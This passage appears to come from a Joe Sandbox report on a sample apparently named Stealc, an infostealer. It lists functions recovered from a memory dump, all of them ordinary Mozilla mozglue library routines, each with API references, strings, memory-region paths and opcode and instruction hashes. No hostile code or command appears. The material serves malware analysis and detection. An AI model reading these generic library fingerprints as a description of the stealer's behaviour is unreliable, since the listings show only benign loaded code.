Part of subcall function 6C110B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C11138F,?,?,?), ref: 6C110B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C11138F,?,?,?), ref: 6C110B27
free.MOZGLUE(?,?,?,?,?,6C11138F,?,?,?), ref: 6C110B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6C110AB5

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: f496938e6559eb8315230d111388a14e7ccfa3f7c73c4f6b42c19f14a2f3e356
Instruction ID: 7d90fd88f1868f93f53302acbaee44b43a9c86e900764bad6bf2b99cf3710c26
Opcode Fuzzy Hash: f496938e6559eb8315230d111388a14e7ccfa3f7c73c4f6b42c19f14a2f3e356
Instruction Fuzzy Hash: AB21BF78F082459BDB04EF54D850BBEB3B9AF85308F14442DD815ABF40DB74AA55CBA1

Function 6C0CF180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C0CF19B

Part of subcall function 6C0ED850: EnterCriticalSection.KERNEL32(?), ref: 6C0ED904
Part of subcall function 6C0ED850: LeaveCriticalSection.KERNEL32(?), ref: 6C0ED971
Part of subcall function 6C0ED850: memset.VCRUNTIME140(?,00000000,?), ref: 6C0ED97B

mozalloc_abort.MOZGLUE(?), ref: 6C0CF209

Strings

d, xrefs: 6C0CF1F5

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: ced2df2ca1e90e10fa071957dcb098623f3e3a809bb2d024f11cac2cf43cd846
Instruction ID: 19bc9a5faa58905eeb349e38e191dc46f90ae1201473c1bbfe65ceca24ef9126
Opcode Fuzzy Hash: ced2df2ca1e90e10fa071957dcb098623f3e3a809bb2d024f11cac2cf43cd846
Instruction Fuzzy Hash: AE116632B0164987EB009F1889512EEB7F9DF8620CB119129DC08AB602EB30AA84C382

Function 6C0DCA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6C0DCA26

Part of subcall function 6C0DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0DCB49
Part of subcall function 6C0DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCBB6

mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2

Strings

d, xrefs: 6C0DCA6C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: 998a08a711a50063b212c41d66af58bb7aeb5feca133827cb26b92da7118e539
Instruction ID: 71f2c5bc6bc1089dae1140989280f7ab6f84a4a6c3ad36c4334eadc9eed85b60
Opcode Fuzzy Hash: 998a08a711a50063b212c41d66af58bb7aeb5feca133827cb26b92da7118e539
Instruction Fuzzy Hash: 4B110821E1479897DB01EB6CC8105FDB7B5EF9621CB469359DC4997612FB70B5C4C380

Function 6C103CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C103D19
mozalloc_abort.MOZGLUE(?), ref: 6C103D6C

Strings

d, xrefs: 6C103D58

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 33b8d9f28a7a4a3d8a0551a8955771fedbc40185ba47686257d1aa8b3ea65938
Instruction ID: ebe7eef879f5e6d8ae1ace420a8b74974331f34e3e369c79475f391426dcd6e5
Opcode Fuzzy Hash: 33b8d9f28a7a4a3d8a0551a8955771fedbc40185ba47686257d1aa8b3ea65938
Instruction Fuzzy Hash: ED11C135F046889BDB01EF69C8149EDB775EF9A318BC58218EC499B602FF30A585D790

Function 6C0E1A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6C0E1A6B

Part of subcall function 6C0E1AF0: EnterCriticalSection.KERNEL32(?), ref: 6C0E1C36

mozalloc_abort.MOZGLUE(?), ref: 6C0E1AE7

Strings

d, xrefs: 6C0E1AB1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 26a55f7114994c75a94b13ef1a85d0b733e47cf4e7433def05b0acd57cfa2f6a
Instruction ID: 142b0420b8728b3a6e4cd3f65cff05264c2a0badf783c56322e823ac56ff2cff
Opcode Fuzzy Hash: 26a55f7114994c75a94b13ef1a85d0b733e47cf4e7433def05b0acd57cfa2f6a
Instruction Fuzzy Hash: 94110232E106589BDB04DBA8C8145FEB7B5EF89218F498619ED496B612EB70E6C4C380

Function 6C0D4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0D44B2,6C14E21C,6C14F7F8), ref: 6C0D473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0D474A

Strings

GetNtLoaderAPI, xrefs: 6C0D4744

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 5795c030fc47c4a0cc508152a2e152f228209249fa1bae6b0cd932943da54d62
Instruction ID: 322f409507e177cbc4df2923b48fc7612f91651038b8e296248a7c80a82a2c8a
Opcode Fuzzy Hash: 5795c030fc47c4a0cc508152a2e152f228209249fa1bae6b0cd932943da54d62
Instruction Fuzzy Hash: FF0192757003149FDF00AFA58454A1D7BF9EF8B359B458069E909DB300DB74E9019F91

Function 6C126DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C126E22
__Init_thread_footer.LIBCMT ref: 6C126E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C126E1D

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 11efb80b513428cb3a25f11249a1bc831f29f87a13faeaf4f1c3a18c4b25b5b2
Instruction ID: 72627e1f526f5c4541ae0a49b0176338a356f918926ae03f29fe672c23c4c140
Opcode Fuzzy Hash: 11efb80b513428cb3a25f11249a1bc831f29f87a13faeaf4f1c3a18c4b25b5b2
Instruction Fuzzy Hash: 06F05939204284CBDB00EBA8C854A927372D72331CF148165CC2047BD1D728B597DE93

Function 6C0D9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C0D9EEF

Strings

Infinity, xrefs: 6C0D9EB7
NaN, xrefs: 6C0D9EC1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: ff207f227c96e278ae20112d6497d4ade7c7ee86c8b8c4d4c23d44b008c9e18a
Instruction ID: 032100d5d1ade14059b3fced8ceed0f2f0e7bbe429bea09d3ec0854cd678f26d
Opcode Fuzzy Hash: ff207f227c96e278ae20112d6497d4ade7c7ee86c8b8c4d4c23d44b008c9e18a
Instruction Fuzzy Hash: 3CF0A971600342CADB10AF58EA59B8233B2E70331DF20CA68C9340BB41D7357596EA82

Function 6C125900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C1451C8), ref: 6C12591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C12592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C125915

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: c4e64864093e4b6a5627850f724b633748aa3c500db16415e76985ae33972ad4
Instruction ID: 8a1a25d25401c0c43ce735c5d23337441c5fdecb4e94e6757d150e2e95e87dda
Opcode Fuzzy Hash: c4e64864093e4b6a5627850f724b633748aa3c500db16415e76985ae33972ad4
Instruction Fuzzy Hash: D0E0DF70204640FBDF00AB68C98CB497FF89B2372DF10C504E56893AC2C3B9A880A791

Function 6C0DBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C0DBEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C0DBEF5

Strings

cryptbase.dll, xrefs: 6C0DBEF0

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: d80b2b41d8894874109af9d5c172c86a6d1e3d33537643ab80cd3d23e706d0a3
Instruction ID: 7c9c08b14fb843d02524b88a03fc59c86e0ca48ffdc1d76caf01fd6dc3e93b32
Opcode Fuzzy Hash: d80b2b41d8894874109af9d5c172c86a6d1e3d33537643ab80cd3d23e706d0a3
Instruction Fuzzy Hash: F2D0C932284608EADA44BBA48D0AF2D3BF8A742729F50C025F755A5951C7B1A451DB94

Function 6C0C50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0C4E9C,?,?,?,?,?), ref: 6C0C510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0C4E9C,?,?,?,?,?), ref: 6C0C5167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C0C5196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0C4E9C), ref: 6C0C5234

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: cb0f06306a0d831b3cd4d69841a563f03983ad7d8a8d28a84baa257e9c0331fa
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: D5918D79605616CFCB15CF08C890A5ABBE1FF99318B288688EC589B715D771FC42CBE1

Function 6C1008F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C100918
LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C1009A6
EnterCriticalSection.KERNEL32(6C14E7DC,?,00000000), ref: 6C1009F3
LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C100ACB

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: cdea691b9818be6a1669c3d4ee3755ebfe37129ba957f025170a72dcc8753531
Instruction ID: 43807701e1a17af58f31eed5d813840b994af6158d34b664603ac46581733a8d
Opcode Fuzzy Hash: cdea691b9818be6a1669c3d4ee3755ebfe37129ba957f025170a72dcc8753531
Instruction Fuzzy Hash: 9051F736701A50CBEB04EE15C415B6A73B1EBC6B38B25C13ADD6997F80DF31A94286D0

Function 6C1259C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C0FE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C125A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C0FE56A,?,|UrlbarCSSSpan), ref: 6C125A5C
free.MOZGLUE(?), ref: 6C125A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C125B9D

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 0fcfc87b2a5d55246a4a1bd08f557d79d0100e5b27f94b97f0f17e2170c9124a
Instruction ID: 675f212aa3fa7bb03e794364662afee6fc826189c7f78cd01ea3c5a0ed54b8eb
Opcode Fuzzy Hash: 0fcfc87b2a5d55246a4a1bd08f557d79d0100e5b27f94b97f0f17e2170c9124a
Instruction Fuzzy Hash: AF516D746087409FD700CF29C8C171ABBE5EF99318F04C96DE8899B746D778E984CB62

Function 6C11B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C11B2C9,?,?,?,6C11B127,?,?,?,?,?,?,?,?,?,6C11AE52), ref: 6C11B628

Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C1190FF
Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C119108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C11B2C9,?,?,?,6C11B127,?,?,?,?,?,?,?,?,?,6C11AE52), ref: 6C11B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C11B2C9,?,?,?,6C11B127,?,?,?,?,?,?,?,?,?,6C11AE52), ref: 6C11B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C11B127,?,?,?,?,?,?,?,?), ref: 6C11B74D

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 44d003b178127ed9b9bffe0d2d68309168d128035f338d03570d7c8bf6d7d8c3
Instruction ID: 9ff1dbf0ee451daf8ff27eacac24456e7d7b45163d06a44696b7434efe5e0304
Opcode Fuzzy Hash: 44d003b178127ed9b9bffe0d2d68309168d128035f338d03570d7c8bf6d7d8c3
Instruction Fuzzy Hash: 4B51FFB1A092168FEB14CF18C99076EB7B5FF85304F46853DC95AABB40D739E805CBA1

Function 6C11DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C10FF2A), ref: 6C11DFFD

Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C1190FF
Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C119108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C10FF2A), ref: 6C11E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C10FF2A), ref: 6C11E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C10FF2A), ref: 6C11E0FE

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: c0a061235e84ca7eb318e1547191881222fe5ffe84bc929cdf9866de6d5adcd3
Instruction ID: f7e94c615685a208bb54b2ca3eb6f9f1a69095aac557215e7cdeaaaa9bdd4bf0
Opcode Fuzzy Hash: c0a061235e84ca7eb318e1547191881222fe5ffe84bc929cdf9866de6d5adcd3
Instruction Fuzzy Hash: DD41D4B57082168FEB14CFA8C89435A73B6BF46308F154539D616DBF40E73AEA04CB92

Function 6C126180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C1261DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C12622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C126250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C126292

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 5508354fed918f5d5f643f39b5981d428872f3bec705c4e5fd93084601418ded
Instruction ID: 6ea5badde2b8507c699afb382bb095743f51d54df6d0f53b33c493c1d0581580
Opcode Fuzzy Hash: 5508354fed918f5d5f643f39b5981d428872f3bec705c4e5fd93084601418ded
Instruction Fuzzy Hash: 60313575A0060E8FDB04DF2CD881BAA73E9FFA5308F108239C55AD7691EB35E598CB50

Function 6C116E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C116EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C116EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C116F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C116F5C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: bfcc1c91ce986aa001353478edae88dda523a245a13d9036cb2228fc83c15472
Instruction ID: b0c35c906f925e5137ee8aefe68caf42631233ea8b93487f12923713f7d2db25
Opcode Fuzzy Hash: bfcc1c91ce986aa001353478edae88dda523a245a13d9036cb2228fc83c15472
Instruction Fuzzy Hash: E331F671A1460A8FDB04CF2CC9906AE73E9EB95304F50827DD41AC7A51EF36E659CB90

Function 6C12B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C0D0A4D), ref: 6C12B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C0D0A4D), ref: 6C12B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0D0A4D), ref: 6C12B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C0D0A4D), ref: 6C12B67F

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 0c78bcedb3a636b3296a1999f4eef0ff30d8856bb4ed3d6428b6e77f8e4abe5c
